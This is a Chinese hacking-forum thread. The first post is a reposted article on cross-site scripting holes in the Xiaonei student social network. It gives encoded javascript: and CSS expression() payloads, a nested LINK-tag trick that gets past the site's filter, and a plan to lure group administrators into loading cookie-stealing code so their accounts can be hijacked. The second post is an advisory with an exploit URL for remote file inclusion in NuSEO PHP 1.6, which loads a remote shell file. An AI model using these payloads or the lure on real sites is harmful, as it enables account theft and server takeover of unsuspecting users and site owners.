最近看过此主题的会员

返回列表 发帖

4nlox

来自QQ:554041204
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:4nlox发表,本帖发表者4nlox符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者4nlox和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。
天地不仁,以万物为刍狗。

校内网跨站漏洞
文章作者:恶魔傻蛋信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 作为最大的大学生社区网站,校内网对于在校的学生一定耳熟能详吧~ 一日,恶魔傻蛋心仪的女生问我,校内网的涂鸦板页面应该怎么美化呢?对网页制作几乎一窍不通恶魔傻蛋十分无奈了说了声不会,就不了了之(郁闷哇~~55). 事后突然想到校内网的涂鸦板不是可以写HTML的嘛,那弄个JS肯定没问题吧~立马跑去试试了是,结果,校内网很无情的把<script>换成XXXXX> javascript:换成了XXXXXXXXGOOD:(注:校内网将javascript后的":"替换成了"GOOD:"而且在将JAVASCRIPT:分解为每行一个字母后,":"仍然被换成了"good:"),至于java script等等经实验,通通失败~ 呵呵,不甘失败的傻蛋在网上大肆寻找资料,功夫不负有心人,终于找到了一篇极为全面的XSS文章:http://ha.ckers.org/xss.html 经过一个个的实验,最终发现两个可以利用的方式~ 将代码转换为长型的UTF-8 UNICODE代码转换前代码
Copy code
<IMG SRC=JAVASCRIPT:ALERT("HAHA")>转换后代码长型UTF-8 UNICODE代码 成功成功 转换为十进制代码转换前
Copy code
<img STYLE="xss:expr/*XSS*/ession(alert(document.cookie))">转换后
Copy code
<img STYLE="xss:expr/*XSS*/ession(alert(document.cookie))"> 成功~看贴图! 成功 跨站漏洞发现后,无意间在校内网的一个黑客群中发现了一个用CSS执行JS的方法:校内网将<LINK>标签替换成空了,但是可以用<LI<LINK>NK>,过滤了一个<LINK>但是留下了一个LINK.呵呵~
Copy code
<li<link/>nk type="text/css" rel="stylesheet" href="1.css" />看图片:CSS利用 CSS利用成功 另外,校内网的群的公告板里也存在跨站漏洞,可以直接使用<LINK>标签(但是禁用了转换进制后的代码). 直接用这个就OK~
Copy code
<link type="text/css" rel="stylesheet" href="1.css" />群公告CSS利用 校内网跨站利用方法(社会工程学):将获取COOKIE的代码写到自己的涂鸦版中,然后去访问一个人气比较旺的群里面(人多的有数万人哦),访问他的管理员的校内空间留个言,作为礼貌只要你在校内给人留言,别人就会到你的空间回复.嘿嘿,上钩了吧,如果那个管理员不幸在登录的时候选择的自动登录,嘿嘿.~(点自动登录后,校内的帐号及密码都会保存在COOKIE中,密码使用MD5加密的).虽然不一定能搞到密码,但是有了COOKIE,登录玩玩还是没问题滴~~然后,到那个群里面自由发挥吧.哇嘎嘎~~


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

nuseo php企业版1.6远程文件包含漏洞
Vulnerability Type: Remote File InclusionVulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.phpExploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?Method: getRegister_globals: OnVulnerable variable: nuseo_dirLine number: 268Lines:----------------------------------------------require_once( $nuseo_dir . '/nuseo' . '_d.php' );//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );----------------------------------------------GrEeTs To sHaDoW sEcUrItY TeAm &amp; str0keFoUnD By BiNgZaDoRk'SEO by NuSEO.PHP'shadowcrew@hotmail.co.ukshadow.php0h.com


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

什么情况··

TOP

返回列表